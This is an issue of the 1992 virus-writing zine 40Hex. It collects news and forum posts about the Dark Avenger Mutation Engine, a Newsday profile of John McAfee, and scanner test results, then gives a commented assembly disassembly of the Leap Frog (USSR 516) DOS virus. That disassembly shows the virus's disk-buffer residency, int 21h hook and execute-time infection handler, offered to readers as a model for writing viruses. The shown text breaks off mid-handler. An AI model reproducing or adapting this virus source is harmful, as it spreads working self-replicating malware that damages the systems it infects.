40Hex Number 7 Volume 2 Issue 3

40Hex Number 7 Volume 2 Issue 3                                       File 005

    Well, by far the most incredible creation in the virus community that
has surfaced is the MtE.  We aren't going to go into details about it, but
we are definately going to give you as much news as we have collected.

In this file:

Article 1:   A note from Vesselin Bontchev
Article 2:   Steve Gibson tells us how to avoid polymorphic viruses
Article 3:   An article from Newsday about McAfee
Article 4:   NIST Expert Warns Feds to Find Better Ways to Head Off Viruses
Article 5:   Some messages posted on Smartnet about MtE


<<<<<<<<<<
Article 1:
<<<<<<<<<<

====From the Virus-L Digest via NIST=====
Date:    10 Feb 92 20:40:23 +0000
>From:    bontchev fbihh.informatik.uni-hamburg.de (Vesselin Bontchev)
Subject: Re: DAV/Sourcer/Rape (PC)

RUTSTEIN HWS.BITNET writes:

> First, has anyone heard about Dark Avenger's latest?  I got a report
> secondhand last week that he'd come up with a new gem...I believe the
> report came from a researcher in the UK.  Fridrik/Vesselin/others, can
> you confirm/deny this report?

Yeah, I can confirm it... :-( And it is a first-hand information,
since I have it. The long-rumored Mutating Engine is real and is
circulated to several virus exchange BBSes... :-(( The bad news is
that the damn thing really mutates, no kidding! It comes as an OBJ
file, which is supposed to be linked to any virus, with a detailed
do-it-yourself guide, and with a demo virus. The demo virus is in
source, but the source of the Mutating Engine (called MtE) is not
provided. According to the docs, what we have is version 0.90-beta of
the MtE, but version 0.91 is also known to exist... I'm wondering what
will be implemented more in version 1.00... :-(((

The damn thing is really difficult to crack! I mean, it contains no
encryption or anti-debugging and anti-disassembling thechniques, but
it mutates too well... I have observed changing of encryption
algorithms, random bytes padding, usage of different ways to express
one and the same algorithm (yeah, that's right - different ways, not
just modifying the opcodes and inserting do-nothing instructions)...
The currently most mutating virus (V2P6Z) is a toy compared to it...

The worst of all is that just anybody can sit and use it to create a
virus. Well, some experience in assembly language programming is
needed, so the kids from RABID, NukE, and the other punk virus writing
groups that use to write overwriting viruses in high-level languages
will have a little bit of trouble to learn how to use it... But a very
little bit!

Currently there are only two viruses, which use the MtE. The first is
the demo virus in the package (a silly, non-resident, COM file
infector, infects only the files in the current directory), and a
virus, called Pogue, which has been available on some VX BBSes in the
USA. McAfee's SCAN 86-B claims to be able to detect the Pogue virus.
Unfortunately, I haven't had the time to verify this (I recieved the
virus just two days ago). There are reports that in fact not all
possible variants of the virus are detected. SCAN 86-B DOES NOT detect
the MtE for sure - I tested it on the demo virus supplied with the
package.

As a conclusion, don't panic. Currently there are only two viruses,
using the MtE and both are too silly to pose a serious threat. Copies
of the MtE have been provided to several anti-virus researchers (no,
don't write me to ask for a copy, you won't get one), including McAfee
Associates, Fridrik Skulason, Dr. Solomon, etc., so there are a lot of
people working right now on the problem. The good news is that once we
learn to recognize the MtE, we'll be able to detect -any- new viruses
that are using it.

Oh, yes, just out of interest. The whole package comes in a neat ZIP
archive, with -AV code for "CrazySoft, Inc.". The Bulgarian hackers
have demonstrated again that the -AV authenticity verification in
PKZIP is just crap, so PLEASE DO NOT RELY ON IT!


<<<<<<<<<<
Article 2:
<<<<<<<<<<

From InfoWorld Magazine
Tech Talk
by Steve Gibson

AT LAST, HOW TO PROTECT YOURSELF FROM POLYMORPHIC VIRUSES

  My past two columns concerning the threat presented by polymorphic
viruses triggered an informative conversation with the industry's
chief virus researcher, John McAfee. During that conversation I
learned that things are even worse than I'd supposed.
  It turns out that the "Dark Avenger" bulletin board system, which
disseminates virus code, has recently published source code for the
Dark Avenger Mutation Engine. The Mutation Engine is nothing less than
a first-class code kernel that can be tacked onto any existing or
future virus to turn it into a nearly impossible to detect
self-encrypting virus.
  My examination of a sample virus encrypted by the Mutation Engine
provided by McAfee revealed alarming capabilities. Not only do the
Dark Avenger Mutation Engine viruses employ all of the capabilities I
outlined in last week's column, but they also use a sophisticated
reversible encryption algorithm generator.
  The Mutation Engine uses a meta-language-driven algorithm generator
that allows it to create an infinite variety of completely original
encryption algorithms. The resulting unique algorithms are then salted
with superfluous instructions, resulting in decryption algorithms
varying from 5 to 200 bytes long.
  Because McAfee has already received many otherwise known viruses
that are now encapsulated with the Mutation Engine's polymorphic
encryption, it's clear that viruses of this new breed are now
traveling among us.
  It is clear that the game is forever changed; the sophistication of
the Mutation Engine is amazing and staggering. Simple pattern-matching
virus scanners will still reliably detect the several thousand
well-known viruses; however, these scanners are completely incapable
of detecting any of the growing number of viruses now being cloaked by
the Dark Avenger Mutation Engine.
  So what can we ultimately do to thwart current and future software
viruses? After brainstorming through the problem with some of our
industry's brightest developers and systems architects, I've reached
several conclusions.
  First, scanning for known viruses within executable program code is
fundamentally a dead end. It's the only solution we have for the
moment, but the detectors can only find the viruses they are aware of,
and new developments such as the Mutation Engine render even these
measures obsolete.
  Second, detecting the reproductive proclivities of viruses on the
prowl is prone to frequent false alarms and ultimately complete
avoidance. With time the viruses will simply circumvent the detectors,
at which time the detectors will only misfire for self-modifying
benign programs.
  Third, the Achilles' heel of our current DOS-based PC is its
entirely unprotected nature. As long as executable programs (such as
benign and helpful system utilities) are able to freely and directly
access and alter the operating system and its file system, our
machines will be vulnerable to deliberate attack.
  So here's my recommendation.
  Only a next-generation protected-mode operating system can enforce
the levels of security required to provide complete viral immunity. By
marking files and code overlays as "read and execute only" and by
prohibiting the sorts of direct file system tampering performed by our
current crop of system utilities, such operating systems will be able
to provide their client programs with complete viral immunity.
  The final Achilles' heel of a protected-mode operating system is the
system boot process, before and during which it is still potentially
vulnerable. By changing the system ROM BIOS' boot priority to favor
hard disk over floppy, this last viral path can be closed and blocked
as well.

(Steve Gibson is the developer and publisher of SpinRite and
president of Gibson Research Corp., based in Irvine California....)


<<<<<<<<<<
Article 3:
<<<<<<<<<<

Date:    Mon, 06 Apr 92 14:18:09 -0400
>From:    Joseph Halloran 
Subject: NY Newsday Article on McAfee & Viruses

     (NOTE: The following article was published as a whole in the
April 5, 1992 edition of New York Newsday, page 68.  It is reprinted
below without the express consent of Joshua Quittner, New York Newsday,
or the Times-Mirror Company)

                        SOFTWARE HARD SELL
                        ------------------
          "Are computer viruses running rampant, or is
           John McAfee's antivirus campaign running amok?"
                                 -By Joshua Quittner, staff writer

    John McAfee is doing one of the things he does best: warning a
reporter about the perils of a new computer virus.
    "We're into the next major nightmare -- the Dark Avenger Mutating
Engine," McAfee says, ever calm in the face of calamity.  "It can
attach to any virus and make it mutate."  The ability to "mutate"
makes it virtually undetectable to antivirus software, he explains.
    "It's turning the virus world upside down."
    But wait.  This is John David McAfee, the man who once ran a service
that revolved around the curious premise that, if you paid him a member-
ship fee and tested HIV-negative, you could have AIDS-free sex with other
members for six months.  This is the man who jumped from biological
viruses to computer viruses and quickly became a flamboyant expert on the
new demi-plague, showing up at the scene of infected PCs in his Winnebago
"antivirus paramedic unit."
     And this is the same man who started something called the Computer
Virus Industry Association, and, as chairman, made national headlines
last month by saying that as many as _five million_ computers might be
infected with a virus named Michelangelo.
     The virus turned out to be a dud, in the opinion of many industry
experts.  But not before McAfee became a media magnet: In the weeks be-
fore March 6, when Michelangelo was supposed to erase the hard disks of
infected IBM and compatible PCs, he was featured by Reuters, the
Associated Press, USA Today, the Wall Street Journal, "MacNeil/Lehrer
News Hour," CNN, "Nightline," National Public Radio and "Today."
     What some news reports failed to point out, however, is that McAfee
is also the man who runs Santa Clara, Calif.-based McAfee Associates,
a leading manufacturer of antivirus software, and that he stood to
benefit from publicity about Michelangelo.  McAfee won't reveal sales,
but it seems clear they shot up during the two-week frenzy.
     "People kept saying I hyped this, I hyped this," said McAfee, who
still defends the notion that Michelangelo was widespread.  "I never
contacted the press -- they called me."
     McAfee's detractors say the Michelangelo scare was mainly hype and
media manipulation, a parade in which most of the floats were built by
McAfee.  They say McAfee helped drive the rush to buy antivirus soft-
ware -- with his products poised to sell the most -- while boosting the
profile of McAfee Associates, a company that recently received
$10 million from venture capitalists McAfee says are waiting to sell
stock publicly.
     And, critics say, while McAfee touts a recent evaluation that rated
his software alone as 100 percent effective in finding virtually every
known virus, he funded the evaluation and picked his competitors.
     "He does know the issue of viruses, no doubt about it," said Ken
Wasch, executive director of the 900-member Software Publishers Assoc-
iation.  "But his tactics are designed to sell _his_ software."
     McAfee says the media consistently misquoted him about how
widespread Michelangelo was.  And his company didn't profit from the
virus, he says, but actually suffered due to the free advice his staff
was dispensing.  "It does not benefit me in any way or shape or form
to exaggerate the virus problem."
    Even McAfee's detractors admit his programs do what they're supposed
to do: track down coding that's maliciously placed in software to make it
do anything from whistle "Yankee Doodle" to erase valuable data.
    His strongest distribution channel is shareware, a kind of software
honor system common on electronic bulletin boards.  PC users can download
the programs over phone lines and pay later if they find them useful.
    McAfee's programs are "probably the most popular shareware programs
of all time, second only to PKZIP," which compresses data, said George
Pulido, technical editor of Shareware Magazine.  He said McAfee's
programs have been copied by millions of people, although only about 10
percent of shareware users actually pay.
    A more reliable money-maker is corporate site licenses, where McAfee
is one of the three biggest players.  Michael Schirf, sales manager of
Jetic Inc., a Vienna, Va., company that is McAfee's sales agent for the
Mid-Atlantic region, claimed more than 300 of the Fortune 500 companies
have licensed his software, paying $3,250 to $20,000, depending on the
number of PCs.  During the Michelangelo scare, "you couldn't get through
to us at one point because of people asking about it and trying to get
it," Schirf said.
    Certainly, McAfee's software wasn't the only antivirus software
selling.  Fueled by giveaways of "special edition" programs that scanned
exclusively for the Michelangelo virus, sales of general antivirus
packages were a bonanza for everyone in the business, including Norton/
Symantec and Central Point Software, two other leading sellers.
    "Our sales of antivirus software were up 3,000 percent," said Tamese
Gribble, a spokesman for Egghead Software, the largest discount software
retailer in the country.  "We were absolutely swamped."
    Rod Turner, a Norton executive vice president, said antivirus sales
increased fivefold.  "We didn't make any product in advance," he said,
"so we were caught with our pants down."  Companies like Norton that
sell factory-shipped software couldn't ramp up quickly enough to take
full advantage of the situation.  But McAfee's software comes mostly
through electronic bulletin boards and sales agents, giving him a nearly
limitless capability to meet demand.  "I can supply as many copies of the
software as I have blank diskettes to put it on," Schirf said.
    The Michelangelo scare was also good for pay-by-the-hour on-line
information services such as Compuserve, which saw a huge increase in the
time users logged on looking for advice on Michelangelo.
    Indeed, a virus forum on Compuserve was hugely popular, with users
downloading antivirus programs, including McAfee's, 49,000 times that
week, Compuserve spokesman Dave Kishler said.  Compuserve made more than
$100,000 from the online time.
    McAfee makes an attractive industry spokesman.  Tall and lean, with a
mellifluous voice, he speaks in perfect sound bites -- an antidote to the
unquotably bland men who otherwise dominate the antivirus business.
    A mathematician who got into programming when he graduated from
Roanoke College, McAfee, 47, said he has held a dozen jobs, ranging from
work on a voice-recognition board for PCs to consulting for the Brazilian
national phone company in Rio de Janeiro.  His first mention in the media
was in connection with the American Association for Safe Sex Practices, a
Santa Clara club formed so that its members could engage in AIDS-free
sex.  For a $22 fee, members whose blood tested HIV-negative were given
cards certifying them AIDS-free, buttons saying "Play it Safe," and were
entered on McAfee's on-line data base.  Updates, every six months, cost
$7.
    Anyone who knows anything about AIDS knows a certificate that someone
is AIDS-free is good only until the person has sex with or shares an
intravenous needle with an infected person.
    When asked now about the safe-sex group, McAfee at first denied
anything but a passing affiliation: "I worked for those people as a con-
tractor," he said, adding, "It was not my company."  But later, when he
was reminded that both the San Diego Tribune and the San Francisco
Chronicle described him in feature stories as the entrepreneur who
started the organization ("I believe I am providing an environment
where people who are sexually active can feel more safe and secure,"
he told the Tribune in a March 9, 1987, story), McAfee sidestepped the
ownership question.  He said the group performed a valuable function,
maintaining a data base on AIDS and information about the disease.
    "I thought they were pretty well ahead of their time," he said,
quickly locating a 1987 newsletter put out by the group, which featured
articles such as "Kissing and AIDS" and "The Apparent Racial Bias of the
AIDS Virus."
    The association no longer exists.  "They came and went pretty fast,"
McAfee said, chuckling.
    McAfee got his first taste of computer viruses at around that time.
"It was an accident, like anything else in life," he recalled.  "I got
a copy of the Pakistani Brain.  I think I got it from one of the local
colleges.  It was the program of the year."  The program, reportedly
written by two Pakistani students trying to foil software pirates,
destroyed some PC data.
    By 1989, McAfee was a virus expert, selling the first antivirus
software and offering to make house calls with his Winnebago cum computer
lab.
    "John's antivirus unit is the first specially customized unit to wage
effective, on-the-spot counterattacks in the virus war," McAfee and a
co-author reported in "Computer Viruses, Worms, Data Diddlers, Killer
Programs, and Other Threats to Your System," their 1989 book.  "Event-
ually, there will be many such mobile search, capture and destroy anti-
virus paramedic units deployed around the world."
    He had also founded the Computer Virus Industry Association, with
himself as chairman.
    "The CVIA is nothing more than McAfee," said Wasch, of the Software
Publishers Association.  "I had a run-in with him three years ago about
that."  Wasch said he had been asked by other antivirus businesses to
look into McAfee's group after claims surfaced that he was railroading
companies into joining -- something McAfee vigorously denies.  Wasch
said he believes the assocation was a self-serving group that did
little more than support McAfee's business.
    "It would be like Microsoft creating the Windows Support Association
as a front to promote its Windows software," Wasch said.
    McAfee denies the CVIA is a front and said Wasch's group was
threatened by the creation of the virus association.  "They wanted to
take us over," he said.  In any event, he said, the association is now
managed by others and his involvement is minimal, adding, "It's more of
a nuisance to me."  But he does say the association is dependent on his
private business for much of its virus data.  "McAfee Associates has all
the numbers," he said.
    Detractors say McAfee now uses another association to hype his
programs.
    The National Computer Security Association released one of the few
ratings of antivirus software, with McAfee's program on top -- a
comparison he's quick to cite.  But that may be because he influenced
which software would be compared with his and how the tests were run,
said David Stang, who founded the for-profit association in Washington,
D.C., two years ago.  Stang recently left the association and started
a new one after a falling-out with McAfee over testing procedures.
    Stang said one of the assocation's functions was to "certify"
antivirus software -- to test and rate competing programs.  "It was his
[McAfee's] idea that we certify products," Stang said.  And when no
company rushed forward to pay $500 to have its software rated, McAfee
"sent me the products and the check and said 'go certify.'"
    McAfee says he spent thousands of dollars to evaluate some of his
competitors' programs.  In February, 1992, in fact, he paid for his own
and the other five programs to be certified.  His was ranked 100 percent
effective.  The others ranged from 44 percent to 88 percent effective.
    "If your product competes with mine, I'd like for those customers of
mine to know that your product isn't as good as mine," he said.  But in
the February certification, notably absent were McAfee's biggest
competitors: Dr. Solomon's ToolKit and Skulason's F-Prot.
    "I've got 75 competitors.  I pick the ones who are going to give me
the most trouble that month," McAfee explained.
    The February evaluation was actually a second, and more favorable
test, that Stang says he performed at McAfee's request.  Stang said
McAfee was dissatisfied with the assocation's methods -- it tested the
software against a "library" of viruses that McAfee thought wasn't
comprehensive enough.  So Stang said he agreed to use a new library that
he claims was built on viruses McAfee found and supplied.  Scores for
McAfee's program rose while some others dropped sharply.  McAfee said
Stang's virus library was incomplete and his testing methods "wishy-
washy," and he defended the new library's independence.
    "This is not something that anybody, let alone me, could mess with,"
said McAfee.  "You can't jimmy these scores.  You can't say that McAfee
buys more certifications, therefore he'll get a better score, because
other vendors would complain."
    "They wouldn't let me get away with it."

[John McAfee]


<<<<<<<<<<
Article 4:
<<<<<<<<<<

From: Government Computer News
      March 30, 1992
By:   Kevin Power, GCN staff

"NIST Expert Warns Feds to Find Better Ways to Head Off Viruses"

BALTIMORE - In the wake of the Michelangelo scare, a top security
expert with the National Institute of Standards and Technology has
warned agencies against relying too heavily on virus scanning
software.
  Anti-virus software ia a useful detection tool, but it often takes
too long to use and does not solve fundamental problems, said Dennis
Steinhauer, manager of the computer security evaluation group at
NIST's Computer Systems Laboratory. He spoke at the March meeting of
the National Computer System Security and Privacy Advisory Board.
  Steinauer said the fallout from Michelangelo was minimal, thanks to
early detection, plenty of publicity and governmentwide [sic]
warnings. But he also stressed that vendors and agencies need more
effective methods of protecting against viruses in newly acquired
hardware and software.
  "What were believed to be reliable channels may no longer be," he
said. "There's a lot that needs to be done to make sure that users
receive better assurances that products are not contaminated. This
incident may have undermined consumer confidence."
  Steinhauer said one solution would be to build hardware and
operating systems that are less vulnerable.
  For example, vendors can isolate the boot sector of a hard drive to
guard against infection. But agencies tend to shy away from such
serious measures, because they force managers make hard choices about
system functionality and user requirements, Steinhauer said.
  "We have the technology to do what is necessary. But we don't know
what the price is to the user," he said. "The question is whether I'm
willing to have my machine hobbled for protection. It's similar to
installing a governor on a car to limit a vehicle's speed to 55 miles
per hour."
   Agencies still are surveying for possible damage inflicted by
Michelangelo, Steinhauer said. But he said the incident showed NIST
officials that more agency computer emergency response teams (CERTs)
are needed.
  CERTs, established in some agencies for just such attacks, worked
well, Steinhauer said. The teams coordinate their work through the
Forum on Incident Response and Security Teams, or FIRST.
  But Steinhauer said it was evident that not enough agencies have
established CERTs.
  Internal agency security teams did their jobs, but the government
needs a better way to distribute security advisories and handle
less-publicized emergencies, Steinhauer said.


<<<<<<<<<<<
Article 5A:
<<<<<<<<<<<

Date: 05-29-92 (21:06)              Number: 3019 of 3059 (Echo)
  To: BILL LAMBDIN                  Refer#: NONE
From: CHARLIE MOORE                   Read: NO
Subj: POLYMORPHIC VIRUSES   1/2     Status: PUBLIC MESSAGE
Conf: VIRUS (52)                 Read Type: GENERAL (+)

Note: This message is a repost -- I tied up the first by failing
      to set the lines per message < 99.  My apologies to all.

Bill, regarding how McAfee's Scan detects the DAME you stated:

BL>Trust me. It is still string searches. McAfee finds those three
BL>bytes, and then follows the steps to decrypt the virus to memory. If
BL>it continues long enough to possitively identify the DAME, Scan
BL>reports the virus, and looks at the next

Now, being in the security business, and probably a bit paranoid as a
result, when I see or hear "Trust me", I get a little queezy. I don't
know the source of your information Bill (perhaps you'll let us know)
but I don't think it's correct.

On May 11, 1992, McAfee Associates was featured in a news release about
the DAME -- Dark Avenger Mutation Engine No Threat to Protected PCs.
Below is a quote from this release that does not track with what you're
telling me (BTW, it was McAfee Associates who sent me the news
release -- did not see it until today though).

     The Mutation Engine, however, uses a special algorithm to
     generate a completely variable decryption routine each time.
     "The result is that no three bytes remain constant from one
     sample to the next," said Igor Grebert, senior programmer at
     McAfee Associates.  "This makes detection using conventional
     string-matching techniques impossible."

Now, in my last message to you I stated that I understood three bytes
did remain constant (I got this info from two sources; Hoffman's Vsum204
and tech support at Fifth Generation Systems -- I now suspect Hofman is
wrong and tech support at Fifth Generation Systems was probably just
parroting Hoffman's Vsum.  As I've stated before, solid technical
information about the DAME is limited!

Today, I called Igor Grebert at McAfee Associates to verify that he was
properly quoted in the news release -- he was.  Igor would not tell me
in detail how McAfee's Scan detects the DAME; however, he did assure me
that searching for a three-byte string was not the technique used.

BL>CM> I don't think anyone, not even the Dark Avenger himself, can put an
BL>CM> accurate number on the possible virus mutations generated by the

BL>Again trust me. It is mathmatics pure and simple.

BL>the DAME randomly picks a 32 bit seed. Each bit will either be a 1 or 0.
BL>... according to my scientific calculator, or 4.3 billion possible
BL>combinations in english.
BL>If the numbers above ring bells, it is binary plain and simple.

Well Bill, I'm certainly not going to argue with your calculator. :-)

However, my point was, and remains, that the possible numbers associated
with a random seed are not necessarily equal to the possible number of
mutations the DAME is capable of generating.  Now, as I stated to you
in my original message, solid information on the DAME (in particular,
how it works interactively with its various segments of code) is
limited.  Even the most experienced and best qualified researchers
often don't agree on certain aspects and more than a few questions
remain about the limits of variability and related issues.

Below is the latest and best info I've seen that gives some insight
into the complexity here.  The message was posted on the Internet's
Virus-L Conference; its author, Vesselin Bontchev, is one of the
most highly respected virus researchers in the world.

Date:    21 May 92 22:11:43 +0000
From:  bontchev@fbihh.informatik.uni-hamburg.de (Vesselin Bontchev)
Subject:  Detecting the MtE (PC)

Almost half an year has passed since the Dark Avenger's Mutating
Engine (MtE) has been made available to the anti-virus researchers.
Currently several scanners claim to detect it with "100 %
reliability". Do they really succeed however?

We decided to run some tests at the VTC. The tests are preliminary and
were performed by Morton Swimmer. The Fear virus was used (a minor
Dedicated patch) to generate 9,471 infected files. The files were
generated by the natural infection process - the reason was to also test
the randomness of the random number generator supplied with the MtE. Of
those 9,471 infected examples 3 turned out to be duplicates, which
yelded to 9,468 different instances of the virus. It also means that the
random number generator is rather good...

Those examples filled a 40 Mb disk (which didn't permit us to generate
10,000 different examples, as we wished initially). We wanted to keep
them all, in order to be able to reproduce the tests.

The three scanners were run on those virus samples. The scanners were
the three that showed best detection rate on our collection, merely
Dr. Solomon's FindVirus (version 4.15 with drivers from May 15, 1992),
Fridrik Skulason's F-Prot 2.03a, and McAfee's SCAN 89-B.

All the three scanners failed the test, each in a different way.

FindVirus showed the worst results. It did not detect 744 virus
samples (7.86 %). F-Prot did not detect 13 examples (0.14 %). SCAN did
not detect 4 examples (0.04 %). SCAN shows the best detection rate in
the case of MtE, but we also got a report for one false positive.
For the average users the above rates might appear to be high enough.
What are 4 undetected infected files when almost 10,000 infected ones
have been properly detected? Well, it does matter. When you are
looking for a particular known virus, anything below 100 % detection
means that your program fails to detect it reliably. Rmember that a
single not detected file may re-start the epidemy.

There is another thing to be concerned about. The MtE uses a 128-byte
random number generator, which means that theoretically it can exist
in 2^512 different variants. And 0.04 % of this is still quite a

CM>   [Hmm...  yet a different number of possible mutations?]

lot... Suppose that some virus writer runs the same tests (or even
more elaborate ones) and determines for which values of the random
number generator the virus is not detected. Then he can create a new
random number generator (the MtE provides the possibility for
user-supplied random number generators to be plugged in), which
generates -only- those values... Such a virus will not vary a lot, but
it will still mutate and -all- its mutations will escape that
particular scanner...

 As I mentioned in the beginning, those were only preliminary tests. We
intend to modify the random number generator so that it will generate
consecutive (instead of random) numbers and to create a few hundreds
thousands mutations by keeping only those which a particular scanner
does NOT detect. We'll then re-run the tests for random ranges of
consecutive mutations. All we can say now is that neither of the three
scanners mentioned above is able to detect MtE-based viruses with 100
% reliability.

Currently I am aware of the existence of at least three other scanners
which claim 100 % detection of the MtE. One comes with the new version
of V-Analyst III, the second has been designed by IBM, and the third
is Dutch scanner. As soon as we get them we'll re-run the tests.

Regards,
Vesselin
----------------------End of Vesselin's Message----------------------

Bill, I'll follow up on the subsequent tests Vesselin intends to run and
report the results to you.

One thing I've learned in this business is that accurate and solid
information is sometimes hard to come by and the experts don't always
have all the answers.  Although I think Vesselin's above message is
pretty solid, I also think he fails to consider something:  on the one
hand, he states a theoretical 2^512 (in contrast, your number is 2^32)
different variants; yet, his empirical data produces 3 duplicate
mutations from a run of less than 10 thousand.  I think this is rather
odd from a statistical perspective.

Regards,
   Charlie Moore
---


<<<<<<<<<<<
Article 5B:
<<<<<<<<<<<

Date: 05-30-92 (15:08)              Number: 3021 of 3059 (Echo)
  To: BILL LAMBDIN                  Refer#: NONE
From: CHARLIE MOORE                   Read: NO
Subj: POLYMORPHIC VIRUSES           Status: PUBLIC MESSAGE
Conf: VIRUS (52)                 Read Type: GENERAL (+)

Bill, here's a followup post from Vesselin regarding the DAME:

-----------------Extracted from Internet's Virus-L--------------------

Date:    27 May 92 08:44:06 +0000
From:    bontchev@fbihh.informatik.uni-hamburg.de (Vesselin Bontchev)
Subject: Re: Detecting the MtE (PC)

bontchev@fbihh.informatik.uni-hamburg.de (Vesselin Bontchev) writes:

> MtE. Of those 9,471 infected examples 3 turned out to be duplicates,
> which yelded to 9,468 different instances of the virus. It also means

Correction: a fourth duplicate has been found later. Therefore the
total number of generated different mutations used during the test is
only 9,467.

> Currently I am aware of the existence of at least three other scanners
> which claim 100 % detection of the MtE. One comes with the new version
> of V-Analyst III, the second has been designed by IBM, and the third
> is Dutch scanner. As soon as we get them we'll re-run the tests.

We tried out the Dutch scanner. Its authors were present during the
test. When they saw the results, they decided that the program is not
ready to be tested yet and promised to send us a fixed version soon...
:-)

We just received the V-Analyst III scanner; we haven't tested it yet.
As soon as the test is performed, I'll post the results.

Meanwhile we received and tested yet another scanner which claims "100%
detection of the MtE-based viruses". It is a German product, called
AntiVir IV and produced by H+BEDV. The version tested was 4.03 of May
15, 1992, beta version. It missed 584 mutations (6.17 %).

Regards,
Vesselin
- --
Vesselin Vladimirov Bontchev           Virus Test Center, University of Hamburg
Tel.:+49-40-54715-224, Fax: +49-40-54715-226       Fachbereich Informatik - AGN
** PGP public key available by finger. **     Vogt-Koelln-Strasse 30, rm. 107 C
e-mail: bontchev@fbihh.informatik.uni-hamburg.de     D-2000 Hamburg 54, Germany

40Hex Number 7 Volume 2 Issue 3                                       File 006

                         Virus Spotlite on: Leap Frog

It's always interesting to find new residency techniques.  I suppose everyone
by now is tired of the traditional high-memory loading routine and is on the
lookout for something different.  40Hex comes to the rescue!

This virus, the "Leap Frog" or USSR 516, has one of the most unique methods
I have ever seen.  I was mucking around in VSUM and noticed that it, according
to Patricia, it "installs itself in a hole in memory between MSDOS and the DOS
Stacks."  She is, of course, not telling us the entire story.  Leap Frog
basically latches onto and resides in a DOS disk buffer.  I do not know who
the author is, but I commend him for his innovative technique.  I took the
liberty of disassembling the virus which is given below.  It should be an
exact byte-for-byte matchup of the original carrier file (or at least should
be extremely similar).  The offsets are in their correct locations, etc, etc.
It is simple to understand and terribly efficient.

Although the coding is tight, there are some inconsistencies.  For
example, I do not understand the purpose of the timing routine(int 21h/ah=30h)
in the code.  I also do not understand why the author decided to infect COM
files in such an abnormal way.  An interesting "feature" is the disabling of
Control-Break checking - a thoroughly unnecessary piece of code.  I believe
further that the line above "findmarker" should read:

                lds     di,dword ptr ds:[30h*4]

In any case, the code is otherwise very, very good.  It is great for studying
by newcomers and "oldtimers" alike.  Things to look for:
  Residency routine
  Lack of extensive use of relative offsets
  Use of stack frame in the interrupt handler
  Critical error handler

Enjoy!                                             Dark Angel of PHALCON/SKISM

ussr516         segment byte public
                assume  cs:ussr516, ds:ussr516
                org     100h
; Disassembled by Dark Angel of PHALCON/SKISM
; for 40Hex Number 7 Volume 2 Issue 3
stub:           db      0e9h, 0, 0
                db      0e9h, 1, 0, 0
; This is where the virus really begins
start:
                push    ax
                call    beginvir

orig4           db      0cdh, 20h, 0, 0
int30store      db      0, 0, 0, 0                     ; Actually it's int 21h
                                                       ; entry point
int21store      db      0, 0, 0, 0

beginvir:       pop     bp                             ; BP -> orig4
                mov     si,bp
                mov     di,103h
                add     di,[di-2]                      ; DI -> orig4
                movsw                                  ; restore original
                movsw                                  ; 4 bytes of program
                xor     si,si
                mov     ds,si
                les     di,dword ptr ds:[21h*4]
                mov     [bp+8],di                      ; int21store
                mov     [bp+0Ah],es
                lds     di,dword ptr ds:[30h*4+1]      ; Bug????
findmarker:
                inc     di
                cmp     word ptr [di-2],0E18Ah         ; Find marker bytes
                jne     findmarker                     ; to the entry point
                mov     [bp+4],di                      ; and move to
                mov     [bp+6],ds                      ; int30store
                mov     ax,5252h                       ; Get list of lists
                int     21h                            ; and also ID check

                add     bx,12h                         ; Already installed?
                jz      quitvir                        ; then exit
                push    bx
                mov     ah,30h                         ; Get DOS version
                int     21h

                pop     bx                             ; bx = 12, ptr to 1st
                                                       ; disk buffer
                cmp     al,3
                je      handlebuffer                   ; if DOS 3
                ja      handleDBHCH                    ; if > DOS 3
                inc     bx                             ; DOS 2.X, offset is 13
handlebuffer:
                push    ds
                push    bx
                lds     bx,dword ptr [bx]              ; Get seg:off of buffer
                inc     si
                pop     di
                pop     es                             ; ES:DI->seg:off buff
                mov     ax,[bx]                        ; ptr to next buffer
                cmp     ax,0FFFFh                      ; least recently used?
                jne     handlebuffer                   ; if not, go find it
                cmp     si,3
                jbe     quitvir
                stosw
                stosw
                jmp     short movetobuffer
handleDBHCH:   ; Disk Buffer Hash Chain Head array
                lds     si,dword ptr [bx]              ; ptr to disk buffer
                lodsw                                  ; info
                lodsw                                  ; seg of disk buffer
                                                       ; hash chain head array
                inc     ax                             ; second entry
                mov     ds,ax
                xor     bx,bx
                mov     si,bx
                lodsw                                  ; EMS page, -1 if not
                                                       ; in EMS
                xchg    ax,di                          ; save in di
                lodsw                                  ; ptr to least recently
                                                       ; used buffer
                mov     [di+2],ax                      ; change disk buffer
                                                       ; backward offset to
                                                       ; least recently used
                xchg    ax,di                          ; restore EMS page
                mov     [di],ax                        ; set to least recently
movetobuffer:                                          ; used
                mov     di,bx
                push    ds
                pop     es                             ; ES:DI -> disk buffer
                push    cs
                pop     ds
                mov     cx,108h
                lea     si,[bp-4]                      ; Copy from start
                rep     movsw
                mov     ds,cx                          ; DS -> interrupt table
                mov     word ptr ds:[4*21h],0BCh       ; New interrupt handler
                mov     word ptr ds:[4*21h+2],es       ; at int21
quitvir:
                push    cs                             ; CS = DS = ES
                pop     es
                push    es
                pop     ds
                pop     ax
                mov     bx,ax
                mov     si, 100h                       ; set up stack for
                push    si                             ; the return to the
                retn                                   ; original program
int24:
                mov     al,3                           ; Ignore all errors
                iret
tickstore       db      3                              ; Why???
buffer          db      3, 0, 9, 0

int21:
                pushf
                cli                                    ; CP/M style call entry
                call    dword ptr cs:[int30store-start]
                retn                                   ; point of int 21h

int21DSDX:                                             ; For int 21h calls
                push    ds                             ; with
                lds     dx,dword ptr [bp+2]            ; DS:DX -> filename
                call    int21
                pop     ds
                retn

                cmp     ax,4B00h                       ; Execute
                je      Execute
                cmp     ax,5252h                       ; ID check
                je      CheckID
                cmp     ah,30h                         ; DOS Version
                je      DosVersion
callorig21:                                            ; Do other calls
                jmp     dword ptr cs:[int21store-start]
DosVersion:    ; Why?????                             ; DOS Version
                dec     byte ptr cs:[tickstore-start]
                jnz     callorig21                     ; Continue if not 0
                push    es
                xor     ax,ax
                push    ax
                mov     es,ax
                mov     al,es:[46Ch]                   ; 40h:6Ch = Timer ticks
                                                       ; since midnight
                and     al,7                           ; MOD 15
                inc     ax
                inc     ax
                mov     cs:[tickstore-start],al        ; # 2-17
                pop     ax
                pop     es
                iret
CheckID:                                               ; ID Check
                mov     bx,0FFEEh                      ; FFEEh = -12h
                iret
Execute:                                               ; Execute
                push    ax                             ; Save registers
                push    cx
                push    es
                push    bx
                push    ds                             ; DS:DX -> filename
                push    dx                             ; save it on stack
                push    bp
                mov     bp,sp                          ; Set up stack frame
                sub     sp,0Ah                         ; Temporary variables
                                                       ; [bp-A] = attributes
                                                       ; [bp-8] = int 24 off
                                                       ; [bp-6] = int 24 seg
                                                       ; [bp-4] = file time
                                                       ; [bp-2] = file date
                sti
                push    cs
